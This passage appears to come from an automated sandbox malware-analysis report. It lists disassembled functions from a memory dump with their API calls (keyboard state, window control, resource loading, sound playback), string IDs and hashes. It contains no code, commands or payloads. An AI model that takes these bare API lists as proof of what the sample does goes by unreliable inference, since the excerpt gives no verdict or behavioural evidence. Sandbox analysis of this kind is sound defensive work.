                                                                                                                                                                  • Instruction ID: ff8ac549b2f5b1d692deb2f31cc829ece379108d0cd7803b8acc9d3582bd7335
                                                                                                                                                                  • Opcode Fuzzy Hash: c89bc926a5d7597056dbe730bcd61ea3e50e2e58b43c396de80faa8da5bfc9b0
                                                                                                                                                                  • Instruction Fuzzy Hash: C551D171810659BBCB14EBE1ED46EEEB779AF14304F104065F105B20A2EB716F68CFA0
                                                                                                                                                                  Function 0022D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0022D37F
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0022D3A0
                                                                                                                                                                  • __swprintf.LIBCMT ref: 0022D3F3
                                                                                                                                                                  • _wprintf.LIBCMT ref: 0022D499
                                                                                                                                                                  • _wprintf.LIBCMT ref: 0022D4B7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                  • API String ID: 2116804098-3420473620
                                                                                                                                                                  • Opcode ID: 3f33526857adeebcea3e12d5c688212ee233c9f4d14850ea7a0454ba1140cc4c
                                                                                                                                                                  • Instruction ID: 7eb85eb76041526c02bc5bfd19ad346213f3e14af52e1a3e0e0682786cd7c928
                                                                                                                                                                  • Opcode Fuzzy Hash: 3f33526857adeebcea3e12d5c688212ee233c9f4d14850ea7a0454ba1140cc4c
                                                                                                                                                                  • Instruction Fuzzy Hash: 4251D071810659BBCB15FBE1ED46EEEB779AF14304F104066B105A20A2EB756F68CFA0
                                                                                                                                                                  Function 00227212 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __swprintf.LIBCMT ref: 00227226
                                                                                                                                                                  • __swprintf.LIBCMT ref: 00227233
                                                                                                                                                                    • Part of subcall function 0020234B: __woutput_l.LIBCMT ref: 002023A4
                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 0022725D
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00227269
                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00227276
                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00227296
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 002272A8
                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 002272B7
                                                                                                                                                                  • LockResource.KERNEL32(?), ref: 002272C3
                                                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00227322
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                                  • String ID: L6)
                                                                                                                                                                  • API String ID: 1433390588-1299162287
                                                                                                                                                                  • Opcode ID: b7af3713ce7b2a0f80dd5d03433a6bcf5a1a3889ded37b65688149ae4235bcee
                                                                                                                                                                  • Instruction ID: 7c611e1559ef452a4a699649bd117e0d1bf3b871fb5f7138e21eaf8b7198dafb
                                                                                                                                                                  • Opcode Fuzzy Hash: b7af3713ce7b2a0f80dd5d03433a6bcf5a1a3889ded37b65688149ae4235bcee
                                                                                                                                                                  • Instruction Fuzzy Hash: 73318071A1826ABBDB019FA0AC99AAB7BA8FF05340F008425FD01D2151E774D960DAB0
                                                                                                                                                                  Function 002283D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E7E53: _memmove.LIBCMT ref: 001E7EB9
                                                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0022843F
                                                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00228455
                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00228466
                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00228478
                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00228489
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: SendString$_memmove
                                                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                  • API String ID: 2279737902-1007645807
                                                                                                                                                                  • Opcode ID: 6cf94cb29272e3fb850b723d68fba43e8efceb8d13d535f831c9c7c864700030
                                                                                                                                                                  • Instruction ID: 44a0ee3131cd29a1de7378427ddfad60dddd077718a62d7536516d74ba8de5a1
                                                                                                                                                                  • Opcode Fuzzy Hash: 6cf94cb29272e3fb850b723d68fba43e8efceb8d13d535f831c9c7c864700030
                                                                                                                                                                  • Instruction Fuzzy Hash: 55114261A601AA7ADB20F7E2DC4ADFF7A7CFBA2B04F440429B411A20D1DFA05E55C5B1
                                                                                                                                                                  Function 00228097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • timeGetTime.WINMM ref: 0022809C
                                                                                                                                                                    • Part of subcall function 001FE3A5: timeGetTime.WINMM(?,75C0B400,00256163), ref: 001FE3A9
                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 002280C8
                                                                                                                                                                  • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 002280EC
                                                                                                                                                                  • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0022810E
                                                                                                                                                                  • SetActiveWindow.USER32 ref: 0022812D
                                                                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0022813B
                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 0022815A
                                                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00228165
                                                                                                                                                                  • IsWindow.USER32 ref: 00228171
                                                                                                                                                                  • EndDialog.USER32(00000000), ref: 00228182
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                  • String ID: BUTTON
                                                                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                                                                  • Opcode ID: e58ff74a2ceb909b8fe60e1460ba66a6134328a834ea9b87a7c333ddfaf91af4
                                                                                                                                                                  • Instruction ID: 17bac4c97fcb07603a471e1c7800aa1faf66a7c81e299974b8b03a46cc83f8b1
                                                                                                                                                                  • Opcode Fuzzy Hash: e58ff74a2ceb909b8fe60e1460ba66a6134328a834ea9b87a7c333ddfaf91af4
                                                                                                                                                                  • Instruction Fuzzy Hash: 2721A170750219BFE7229FA1FC8DB277FAAF71A388B544114F506822A1DFB28D258A11
                                                                                                                                                                  Function 002308D9 Relevance: 18.2, APIs: 12, Instructions: 196COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3566271842-0
                                                                                                                                                                  • Opcode ID: fb60ecd58c0141c5196f2e1ebc3791120b3ccdfafeeb47717d2be060381c7018
                                                                                                                                                                  • Instruction ID: 30a438b7cc83a567dcfcd8a18e38520ad7552c69f99ec2255daedde0f9ee8928
                                                                                                                                                                  • Opcode Fuzzy Hash: fb60ecd58c0141c5196f2e1ebc3791120b3ccdfafeeb47717d2be060381c7018
                                                                                                                                                                  • Instruction Fuzzy Hash: 26713EB5A10219AFDB10DFA4D898ADEB7B8FF48314F048495E909EB251DB70EE51CF90
                                                                                                                                                                  Function 0022388D Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00223908
                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00223973
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00223993
                                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 002239AA
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 002239D9
                                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 002239EA
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00223A16
                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00223A24
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00223A4D
                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00223A5B
                                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00223A84
                                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00223A92
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                  • Opcode ID: 59b5a8e709fe5d8f2a54e2c44169436708a299321faef61f4ae45e8694d5d76d
                                                                                                                                                                  • Instruction ID: b1afef5a3514940231b92084ea79b542ebc33fd5e96d6ad514bf1325a85fdd03
                                                                                                                                                                  • Opcode Fuzzy Hash: 59b5a8e709fe5d8f2a54e2c44169436708a299321faef61f4ae45e8694d5d76d
                                                                                                                                                                  • Instruction Fuzzy Hash: 7C510C30A147A939FB35EFE4A4017EABFF45F11340F08859ED5C25A1C2DA589B9CCB62
                                                                                                                                                                  Function 0021FAFD Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 0021FB19
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0021FB2B
                                                                                                                                                                  • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0021FB89
                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 0021FB94
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0021FBA6
                                                                                                                                                                  • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0021FBFC
                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0021FC0A
                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0021FC1B
                                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0021FC5E
                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 0021FC6C
                                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0021FC89
                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0021FC96
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                                                  • Opcode ID: 660f9686e0b99c274454e439558a9ddbeab3440d1aad278e91a999b58439e0e2
                                                                                                                                                                  • Instruction ID: f1d671a3e07dcc865ad51d2accc6bcb045b4592451f4d2d53ab1ae21eb3847ae
                                                                                                                                                                  • Opcode Fuzzy Hash: 660f9686e0b99c274454e439558a9ddbeab3440d1aad278e91a999b58439e0e2
                                                                                                                                                                  • Instruction Fuzzy Hash: 30514671B00209AFDB04CF69DD99AAEBBB9FB98314F14813DF515D7290D7B09D408B50
                                                                                                                                                                  Function 001FB039 Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001FB155: GetWindowLongW.USER32(?,000000EB), ref: 001FB166
                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 001FB067
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ColorLongWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 259745315-0
                                                                                                                                                                  • Opcode ID: 0ba478f6fe476d70336db64f2d9ad427530108b5caabacd97c602dd610fa7b91
                                                                                                                                                                  • Instruction ID: ea3651c02c8455661cd89931d95341d441993882fb5add817d7c64b4ca35c58e
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ba478f6fe476d70336db64f2d9ad427530108b5caabacd97c602dd610fa7b91
                                                                                                                                                                  • Instruction Fuzzy Hash: C441C631608548AFDF245F28ECC8BBA3B75AB46731F198261FE758A1E1DB718D41CB21
                                                                                                                                                                  Function 00227334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 136442275-0
                                                                                                                                                                  • Opcode ID: 129d0d39416e60f51489084f7058afaa2ea2145f12f5af59f70482a0dd648192
                                                                                                                                                                  • Instruction ID: db2500c2232b39e1c47852ac1fb91510c2c4b2e2ef1322ed385a446604953636
                                                                                                                                                                  • Opcode Fuzzy Hash: 129d0d39416e60f51489084f7058afaa2ea2145f12f5af59f70482a0dd648192
                                                                                                                                                                  • Instruction Fuzzy Hash: 6641117281422CAADB21EB90DC55EDE73BCBF48310F1041E6B519A2081EB71ABE4CF64
                                                                                                                                                                  Function 001E84A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                  • __itow.LIBCMT ref: 001E8519
                                                                                                                                                                    • Part of subcall function 00202177: _xtow@16.LIBCMT ref: 00202198
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: __itow__swprintf_xtow@16
                                                                                                                                                                  • String ID: %.15g$0x%p$False$True
                                                                                                                                                                  • API String ID: 1502193981-2263619337
                                                                                                                                                                  • Opcode ID: 7791bc0a2e1c63ec6d59a921233465f0c4452440f8617a63b2acabe34e92f877
                                                                                                                                                                  • Instruction ID: 4301d13f3028044dc7becd74ea286649c372c6cb2fe9ab424097b711e0d155ab
                                                                                                                                                                  • Opcode Fuzzy Hash: 7791bc0a2e1c63ec6d59a921233465f0c4452440f8617a63b2acabe34e92f877
                                                                                                                                                                  • Instruction Fuzzy Hash: 4941F331524A069BEB24DF38D841F6AB3E5FF44310F20446AE54ED72D2EA319A55CB10
                                                                                                                                                                  Function 00205C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00205CCA
                                                                                                                                                                    • Part of subcall function 0020889E: __getptd_noexit.LIBCMT ref: 0020889E
                                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00205D63
                                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00205D99
                                                                                                                                                                  • __gmtime64_s.LIBCMT ref: 00205DB6
                                                                                                                                                                  • __allrem.LIBCMT ref: 00205E0C
                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00205E28
                                                                                                                                                                  • __allrem.LIBCMT ref: 00205E3F
                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00205E5D
                                                                                                                                                                  • __allrem.LIBCMT ref: 00205E74
                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00205E92
                                                                                                                                                                  • __invoke_watson.LIBCMT ref: 00205F03
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 384356119-0
